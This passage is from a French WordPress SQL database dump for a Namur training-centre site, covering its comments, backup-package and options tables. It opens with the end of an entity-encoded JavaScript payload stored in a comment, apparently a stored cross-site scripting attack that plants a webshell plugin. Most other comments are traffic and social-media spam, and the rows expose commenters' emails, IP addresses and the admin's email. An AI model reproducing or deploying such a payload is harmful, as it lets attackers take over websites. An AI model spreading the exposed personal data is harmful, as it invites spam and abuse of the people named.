032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(152, 1, 'Mark', 'mark357177@hotmail.com', 'http://www.FyLitCl7Pf7kjQdDUOLQOuaxTXbj5iNG.com', '188.143.232.70', '2016-01-29 20:15:46', '2016-01-29 20:15:46', 'mFCLbZ http://www.FyLitCl7Pf7kjQdDUOLQOuaxTXbj5iNG.com', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(153, 1, 'Natalie', 'qijvsuih@srhfdhs.com', 'http://yxbp.com/5kje', '45.40.37.103', '2016-04-13 10:07:26', '2016-04-13 10:07:26', 'I was just looking at your Hello world! | Cross Training Center (Namur) site and see that your site has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are looking for topics like yours. By getting your website on this service you have a chance to get your site more popular than you can imagine. It is free to sign up and you can read more about it here: http://yxbp.com/2m6y - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your website on the network I am describing. This traffic network advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular websites are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Read more here: http://yxbp.com/5kje', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(154, 1, 'Emily', 'yrksgbfl@gmail.com', 'http://mariowelte.de/8ajy', '37.9.44.241', '2016-05-01 01:09:13', '2016-05-01 01:09:13', 'Hello my name is Emily and I just wanted to send you a quick message here instead of calling you. I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more hits. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get keyword targeted traffic from and they let you try the service for free for 7 days. I managed to get over 300 targeted visitors to day to my site. Visit them here: http://janluetzler.de/5ier', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(155, 1, 'Donna', 'wsgtobsi@gmail.com', 'http://nfc.lol/7uzt', '23.95.253.154', '2016-05-07 07:33:16', '2016-05-07 07:33:16', 'Hello, I tried calling you several times today, and I\'m not getting through for some reason. If your website does not have many Facebook Likes, why would someone visit your Facebook Fanpage? People Like you when other people like you. The more people that LIKE your website and fanpage on Facebook, the more credibility you will have with new visitors. It works the same for Twitter, Instagram and Youtube. When people visit your page and see that you have a lot of followers, they now want to follow you too. They too want to know what all the hype is and why all those people are following you. Get some free likes, followers, and views just for trying this service I found: http://shrtlnk.de/7w9i', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0);
INSERT INTO `www2_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(156, 1, 'Donna', 'lntqureenao@gmail.com', 'http://janluetzler.de/3vm2', '23.95.251.133', '2016-05-16 08:42:53', '2016-05-16 08:42:53', 'Did you just create your new Facebook page? Do you want your page to look a little more \"established\"? I found a service that can help you with that. They can send organic and 100% real likes and followers to your social pages and you can try before you buy with their free trial. Their service is completely safe and they send all likes to your page naturally and over time so nobody will suspect that you bought them. Try their service for free here: http://janluetzler.de/3vm2', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(157, 1, 'Donna', 'oajaob@googlemail.com', 'http://yourls.endinahosting.com/zupe', '23.95.253.154', '2016-06-01 06:24:09', '2016-06-01 06:24:09', 'Did you just create your new Facebook page? Do you want your page to look a little more \"established\"? I found a service that can help you with that. They can send organic and 100% real likes and followers to your social pages and you can try before you buy with their free trial. Their service is completely safe and they send all likes to your page naturally and over time so nobody will suspect that you bought them. Try their service for free here: http://shrtlnk.de/7w9i', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(158, 1, 'Sabrina Warren', 'zgysuezzp@hyvagbn.com', 'http://kfon.eu/3', '69.16.147.156', '2017-02-23 03:22:44', '2017-02-23 03:22:44', 'Hi my name is Sabrina Warren and I just wanted to send you a quick message here instead of calling you. I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more hits. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your website topic. There is a company that you can get keyword targeted traffic from and they let you try the service for free for 7 days. I managed to get over 300 targeted visitors to day to my site. http://smpros.tk/q', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(159, 1, 'Sabrina Warren', 'pggzmxk@pqmggzw.com', 'http://smpros.tk/q', '69.16.147.148', '2017-02-28 15:35:12', '2017-02-28 15:35:12', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and the majority of the users are looking for websites like yours. By getting your site on this network you have a chance to get your site more popular than you can imagine. It is free to sign up and you can find out more about it here: http://s.beautheac.net/52 - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the service I am describing. This traffic service advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular blogs are using this service to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Find out more here: http://acortarurl.es/5i', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(160, 1, 'Sandra', 'nxwnovdsip@nrnwpdi.com', 'http://shorturl.van.ee/8', '31.168.172.137', '2017-03-03 02:32:46', '2017-03-03 02:32:46', 'Did you just create your new Facebook page? Do you want your page to look a little more \"established\"? I found a service that can help you with that. They can send organic and 100% real likes and followers to your social pages and you can try before you buy with their free trial. Their service is completely safe and they send all likes to your page naturally and over time so nobody will suspect that you bought them. Try their service for free here: http://v-doc.co/nm/39zu3', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(161, 1, 'Vickie Figueroa', 'vcpkcc@soagklfa.com', 'http://link.virtualrick.com/8u', '208.167.254.86', '2017-03-16 16:47:10', '2017-03-16 16:47:10', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and most of the users are interested in topics like yours. By getting your site on this service you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can read more about it here: http://link.virtualrick.com/8u - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted traffic who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your website on the service I am talking about. This traffic service advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular blogs are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Find out more here: http://kfon.eu/k', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(162, 1, 'Tami Sandoval', 'osljwqxxiti@miyabuy.com', 'http://wntdco.mx/vlyb4', '209.107.214.136', '2017-03-30 04:12:35', '2017-03-30 04:12:35', 'Hi my name is Tami Sandoval and I just wanted to send you a quick message here instead of calling you. I came to your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a successful website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get keyword targeted visitors from and they let you try the service for free for 7 days. I managed to get over 300 targeted visitors to day to my website. http://soheavyblog.com/1m', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(163, 1, 'Elisa Brown', 'leyswgiuz@mrflazu.com', 'http://shorturl.van.ee/h', '81.171.97.125', '2017-04-24 05:51:52', '2017-04-24 05:51:52', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE web traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://priscilarodrigues.com.br/url/v', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(164, 1, 'Elisa Brown', 'exhneloegrv@fqehdcymi.com', 'http://priscilarodrigues.com.br/url/v', '205.185.209.130', '2017-04-28 22:17:38', '2017-04-28 22:17:38', 'This is a message to the Hello world! | Cross Training Center (Namur) admin. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your website: http://priscilarodrigues.com.br/url/v - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)                                                                                                                                                - Unsubscribe here: http://acortarurl.es/8y', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(165, 1, 'Chelsea Wallace', 'hqklgtrqgwh@fvrmaw.com', 'http://pcgroup.com.uy/15', '81.171.81.234', '2017-05-24 14:50:12', '2017-05-24 14:50:12', 'This is a message to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your site: http://pcgroup.com.uy/15 - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)																				Unsubscribe here: http://acortarurl.es/97', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(166, 1, 'Sarah Hughes', 'lnuawlisx@jdiszkxd.com', 'http://magc.co/7fe', '209.197.6.138', '2017-06-04 23:43:49', '2017-06-04 23:43:49', 'This is a message to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your site: http://tdil.co/3p - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)																				Unsubscribe here: http://tdil.co/5p', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(167, 1, 'Sarah Hughes', 'ghfqfdsus@tqlqjagzcz.com', 'http://priscilarodrigues.com.br/url/v', '196.52.32.11', '2017-06-14 02:53:08', '2017-06-14 02:53:08', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE web traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://magc.co/7fe																				Unsubscribe here: http://tdil.co/5p', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(168, 1, 'Ann Weaver', 'idllhldszt@gouxwnil.com', 'http://magc.co/7fe', '205.185.209.188', '2017-06-24 18:28:52', '2017-06-24 18:28:52', 'I came to your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Check it out here: http://stpicks.com/27																			Unsubscribe here: http://pcgroup.com.uy/2a', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(169, 1, 'Ann Weaver', 'bjzhzk@fjiauool.com', 'http://stpicks.com/27', '81.171.81.55', '2017-07-05 18:51:29', '2017-07-05 18:51:29', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE web traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://pcgroup.com.uy/15																				Unsubscribe here: http://pcgroup.com.uy/2a', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0);

-- --------------------------------------------------------

--
-- Structure de la table `www2_duplicator_packages`
--

CREATE TABLE `www2_duplicator_packages` (
  `id` bigint(20) UNSIGNED NOT NULL,
  `name` varchar(250) NOT NULL,
  `hash` varchar(50) NOT NULL,
  `status` int(11) NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `owner` varchar(60) NOT NULL,
  `package` mediumblob NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_duplicator_packages`
--

INSERT INTO `www2_duplicator_packages` (`id`, `name`, `hash`, `status`, `created`, `owner`, `package`) VALUES
(1, '20150421_crosstrainingcenternamurlim', '55360c9a6f4bd2277150421083850', 100, '2015-04-21 08:39:08', 'admin', 0x4f3a31313a224455505f5061636b616765223a31363a7b733a323a224944223b693a313b733a343a224e616d65223b733a33363a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d223b733a343a2248617368223b733a32393a223535333630633961366634626432323737313530343231303833383530223b733a383a224e616d6548617368223b733a36363a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f3535333630633961366634626432323737313530343231303833383530223b733a373a2256657273696f6e223b733a363a22302e352e3136223b733a343a2254797065223b693a303b733a353a224e6f746573223b733a303a22223b733a393a2253746f726550617468223b733a33353a222f686f6d652f63726f73737472612f7777772f77702d736e617073686f74732f746d70223b733a383a2253746f726555524c223b733a34373a22687474703a2f2f7777772e63726f7373747261696e696e6763656e7465722e62652f77702d736e617073686f74732f223b733a383a225363616e46696c65223b733a37363a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f35353336306339613666346264323237373135303432313038333835305f7363616e2e6a736f6e223b733a373a2252756e74696d65223b733a393a22372e3536207365632e223b733a373a2245786553697a65223b733a383a223331362e39324b42223b733a373a225a697053697a65223b733a373a2231362e36324d42223b733a373a2241726368697665223b4f3a31313a224455505f41726368697665223a31373a7b733a31303a2246696c74657244697273223b733a303a22223b733a31303a2246696c74657245787473223b733a303a22223b733a383a2246696c7465724f6e223b693a303b733a343a2246696c65223b733a37383a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f35353336306339613666346264323237373135303432313038333835305f617263686976652e7a6970223b733a363a22466f726d6174223b733a333a225a4950223b733a373a225061636b446972223b733a31383a222f686f6d652f63726f73737472612f777777223b733a343a2253697a65223b693a31373432363039373b733a31323a225761726e46696c6553697a65223b613a303a7b7d733a31323a225761726e46696c654e616d65223b613a303a7b7d733a343a2244697273223b613a303a7b7d733a353a2246696c6573223b613a303a7b7d733a353a224c696e6b73223b613a303a7b7d733a383a224f6d697444697273223b613a303a7b7d733a393a224f6d697446696c6573223b613a303a7b7d733a31303a22002a005061636b616765223b723a313b733a32383a22004455505f417263686976650066696c746572446972734172726179223b613a303a7b7d733a32383a22004455505f417263686976650066696c746572457874734172726179223b613a303a7b7d7d733a393a22496e7374616c6c6572223b4f3a31333a224455505f496e7374616c6c6572223a31313a7b733a343a2246696c65223b733a38303a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f35353336306339613666346264323237373135303432313038333835305f696e7374616c6c65722e706870223b733a343a2253697a65223b693a3332343532393b733a31303a224f7074734442486f7374223b733a303a22223b733a31303a224f70747344424e616d65223b733a303a22223b733a31303a224f707473444255736572223b733a303a22223b733a31323a224f70747353534c41646d696e223b693a303b733a31323a224f70747353534c4c6f67696e223b693a303b733a31313a224f70747343616368655750223b693a303b733a31333a224f707473436163686550617468223b693a303b733a31303a224f70747355524c4e6577223b733a303a22223b733a31303a22002a005061636b616765223b723a313b7d733a383a224461746162617365223b4f3a31323a224455505f4461746162617365223a31313a7b733a343a2254797065223b733a353a224d7953514c223b733a343a2253697a65223b693a363235393032303b733a343a2246696c65223b733a37393a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f35353336306339613666346264323237373135303432313038333835305f64617461626173652e73716c223b733a343a2250617468223b4e3b733a31323a2246696c7465725461626c6573223b733a303a22223b733a383a2246696c7465724f6e223b693a303b733a343a224e616d65223b4e3b733a31303a22002a005061636b616765223b723a313b733a32353a22004455505f446174616261736500646253746f726550617468223b733a3131353a222f686f6d652f63726f73737472612f7777772f77702d736e617073686f74732f746d702f32303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f35353336306339613666346264323237373135303432313038333835305f64617461626173652e73716c223b733a32333a22004455505f446174616261736500454f464d61726b6572223b733a303a22223b733a32363a22004455505f4461746162617365006e6574776f726b466c757368223b623a303b7d7d),
(2, '20150421_crosstrainingcenternamurlim', '55378bec6410b4213150422115420', 100, '2015-04-22 11:54:36', 'admin', 0x4f3a31313a224455505f5061636b616765223a31363a7b733a323a224944223b693a323b733a343a224e616d65223b733a33363a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d223b733a343a2248617368223b733a32393a223535333738626563363431306234323133313530343232313135343230223b733a383a224e616d6548617368223b733a36363a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f3535333738626563363431306234323133313530343232313135343230223b733a373a2256657273696f6e223b733a363a22302e352e3136223b733a343a2254797065223b693a303b733a353a224e6f746573223b733a303a22223b733a393a2253746f726550617468223b733a33353a222f686f6d652f63726f73737472612f7777772f77702d736e617073686f74732f746d70223b733a383a2253746f726555524c223b733a34373a22687474703a2f2f7777772e63726f7373747261696e696e6763656e7465722e62652f77702d736e617073686f74732f223b733a383a225363616e46696c65223b733a37363a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f35353337386265633634313062343231333135303432323131353432305f7363616e2e6a736f6e223b733a373a2252756e74696d65223b733a393a22392e3933207365632e223b733a373a2245786553697a65223b733a383a223331362e39314b42223b733a373a225a697053697a65223b733a363a2231382e314d42223b733a373a2241726368697665223b4f3a31313a224455505f41726368697665223a31373a7b733a31303a2246696c74657244697273223b733a303a22223b733a31303a2246696c74657245787473223b733a303a22223b733a383a2246696c7465724f6e223b693a303b733a343a2246696c65223b733a37383a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f35353337386265633634313062343231333135303432323131353432305f617263686976652e7a6970223b733a363a22466f726d6174223b733a333a225a4950223b733a373a225061636b446972223b733a31383a222f686f6d652f63726f73737472612f777777223b733a343a2253697a65223b693a31383937363138333b733a31323a225761726e46696c6553697a65223b613a303a7b7d733a31323a225761726e46696c654e616d65223b613a303a7b7d733a343a2244697273223b613a303a7b7d733a353a2246696c6573223b613a303a7b7d733a353a224c696e6b73223b613a303a7b7d733a383a224f6d697444697273223b613a303a7b7d733a393a224f6d697446696c6573223b613a303a7b7d733a31303a22002a005061636b616765223b723a313b733a32383a22004455505f417263686976650066696c746572446972734172726179223b613a303a7b7d733a32383a22004455505f417263686976650066696c746572457874734172726179223b613a303a7b7d7d733a393a22496e7374616c6c6572223b4f3a31333a224455505f496e7374616c6c6572223a31313a7b733a343a2246696c65223b733a38303a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f35353337386265633634313062343231333135303432323131353432305f696e7374616c6c65722e706870223b733a343a2253697a65223b693a3332343531373b733a31303a224f7074734442486f7374223b733a303a22223b733a31303a224f70747344424e616d65223b733a303a22223b733a31303a224f707473444255736572223b733a303a22223b733a31323a224f70747353534c41646d696e223b693a303b733a31323a224f70747353534c4c6f67696e223b693a303b733a31313a224f70747343616368655750223b693a303b733a31333a224f707473436163686550617468223b693a303b733a31303a224f70747355524c4e6577223b733a303a22223b733a31303a22002a005061636b616765223b723a313b7d733a383a224461746162617365223b4f3a31323a224455505f4461746162617365223a31313a7b733a343a2254797065223b733a353a224d7953514c223b733a343a2253697a65223b693a363736363735333b733a343a2246696c65223b733a37393a2232303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f35353337386265633634313062343231333135303432323131353432305f64617461626173652e73716c223b733a343a2250617468223b4e3b733a31323a2246696c7465725461626c6573223b733a303a22223b733a383a2246696c7465724f6e223b693a303b733a343a224e616d65223b4e3b733a31303a22002a005061636b616765223b723a313b733a32353a22004455505f446174616261736500646253746f726550617468223b733a3131353a222f686f6d652f63726f73737472612f7777772f77702d736e617073686f74732f746d702f32303135303432315f63726f7373747261696e696e6763656e7465726e616d75726c696d5f35353337386265633634313062343231333135303432323131353432305f64617461626173652e73716c223b733a32333a22004455505f446174616261736500454f464d61726b6572223b733a303a22223b733a32363a22004455505f4461746162617365006e6574776f726b466c757368223b623a303b7d7d);

-- --------------------------------------------------------

--
-- Structure de la table `www2_links`
--

CREATE TABLE `www2_links` (
  `link_id` bigint(20) UNSIGNED NOT NULL,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) UNSIGNED NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `www2_options`
--

CREATE TABLE `www2_options` (
  `option_id` bigint(20) UNSIGNED NOT NULL,
  `option_name` varchar(64) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_options`
--

INSERT INTO `www2_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(1, 'siteurl', 'http://www.crosstrainingcenter.be', 'yes'),
(2, 'blogname', 'Cross Training Center (Namur)', 'yes'),
(3, 'blogdescription', '', 'yes'),
(4, 'users_can_register', '0', 'yes'),
(5, 'admin_email', 'dpierrard@gmail.com', 'yes'),
(6, 'start_of_week', '1', 'yes'),
(7, 'use_balanceTags', '0', 'yes'),
(8, 'use_smilies', '1', 'yes'),
(9, 'require_name_email', '1', 'yes'),
(10, 'comments_notify', '1', 'yes'),
(11, 'posts_per_rss', '10', 'yes'),
(12, 'rss_use_excerpt', '0', 'yes'),
(13, 'mailserver_url', 'mail.example.com', 'yes'),
(14, 'mailserver_login', 'login@example.com', 'yes'),
(15, 'mailserver_pass', 'password', 'yes'),
(16, 'mailserver_port', '110', 'yes'),
(17, 'default_category', '1', 'yes'),
(18, 'default_comment_status', 'open', 'yes'),
(19, 'default_ping_status', 'open', 'yes'),
(20, 'default_pingback_flag', '1', 'yes'),
(21, 'posts_per_page', '10', 'yes'),
(22, 'date_format', 'F j, Y', 'yes'),
(23, 'time_format', 'g:i a', 'yes'),
(24, 'links_updated_date_format', 'F j, Y g:i a', 'yes'),
(25, 'links_recently_updated_prepend', '<em>', 'yes'),
(26, 'links_recently_updated_append', '</em>', 'yes'),
(27, 'links_recently_updated_time', '120', 'yes'),
(28, 'comment_moderation', '0', 'yes'),
(29, 'moderation_notify', '1', 'yes'),
(30, 'permalink_structure', '/%postname%/', 'yes'),
(31, 'gzipcompression', '0', 'yes'),
(32, 'hack_file', '0', 'yes'),
(33, 'blog_charset', 'UTF-8', 'yes'),
(34, 'moderation_keys', '', 'no'),
(35, 'active_plugins', 'a:13:{i:0;s:35:\"clicface-trombi/clicface-trombi.php\";i:1;s:36:\"contact-form-7/wp-contact-form-7.php\";i:2;s:35:\"display-widgets/display-widgets.php\";i:3;s:25:\"duplicator/duplicator.php\";i:4;s:25:\"easy-table/easy-table.php\";i:5;s:43:\"google-analyticator/google-analyticator.php\";i:6;s:19:\"piklist/piklist.php\";i:7;s:47:\"really-simple-captcha/really-simple-captcha.php\";i:8;s:29:\"seo-ultimate/seo-ultimate.php\";i:9;s:31:\"slideshow-manager/slideshow.php\";i:10;s:29:\"total-slider/total-slider.php\";i:11;s:37:\"widgets-on-pages/widgets_on_pages.php\";i:12;s:23:\"wordfence/wordfence.php\";}', 'yes'),
(36, 'home', 'http://www.crosstrainingcenter.be', 'yes'),
(37, 'category_base', '', 'yes'),
(38, 'ping_sites', 'http://rpc.pingomatic.com/', 'yes'),
(39, 'advanced_edit', '0', 'yes'),
(40, 'comment_max_links', '2', 'yes'),
(41, 'gmt_offset', '0', 'yes'),
(42, 'default_email_category', '1', 'yes'),
(43, 'recently_edited', 'a:5:{i:0;s:58:\"/home/crosstra/www/wp-content/themes/figero/front-page.php\";i:1;s:53:\"/home/crosstra/www/wp-content/themes/figero/style.css\";i:3;s:55:\"/home/crosstra/www/wp-content/themes/figero/sidebar.php\";i:4;s:53:\"/home/crosstra/www/wp-content/themes/figero/index.php\";i:5;s:57:\"/home/crosstra/www/wp-content/themes/figero/functions.php\";}', 'no'),
(44, 'template', 'figero', 'yes'),
(45, 'stylesheet', 'figero', 'yes'),
(46, 'comment_whitelist', '1', 'yes'),
(47, 'blacklist_keys', '', 'no'),
(48, 'comment_registration', '0', 'yes'),
(49, 'html_type', 'text/html', 'yes'),
(50, 'use_trackback', '0', 'yes'),
(51, 'default_role', 'subscriber', 'yes'),
(52, 'db_version', '26151', 'yes'),
(53, 'uploads_use_yearmonth_folders', '1', 'yes'),
(54, 'upload_path', '', 'yes'),
(55, 'blog_public', '1', 'yes'),
(56, 'default_link_category', '2', 'yes'),
(57, 'show_on_front', 'posts', 'yes'),
(58, 'tag_base', '', 'yes'),
(59, 'show_avatars', '1', 'yes'),
(60, 'avatar_rating', 'G', 'yes'),
(61, 'upload_url_path', '', 'yes'),
(62, 'thumbnail_size_w', '150', 'yes'),
(63, 'thumbnail_size_h', '150', 'yes'),
(64, 'thumbnail_crop', '1', 'yes'),
(65, 'medium_size_w', '300', 'yes'),
(66, 'medium_size_h', '300', 'yes'),
(67, 'avatar_default', 'mystery', 'yes'),
(68, 'large_size_w', '1024', 'yes'),
(69, 'large_size_h', '1024', 'yes'),
(70, 'image_default_link_type', 'file', 'yes'),
(71, 'image_default_size', '', 'yes'),
(72, 'image_default_align', '', 'yes'),
(73, 'close_comments_for_old_posts', '0', 'yes'),
(74, 'close_comments_days_old', '14', 'yes'),
(75, 'thread_comments', '1', 'yes'),
(76, 'thread_comments_depth', '5', 'yes'),
(77, 'page_comments', '0', 'yes'),
(78, 'comments_per_page', '50', 'yes'),
(79, 'default_comments_page', 'newest', 'yes'),
(80, 'comment_order', 'asc', 'yes'),
(81, 'sticky_posts', 'a:0:{}', 'yes'),
(82, 'widget_categories', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
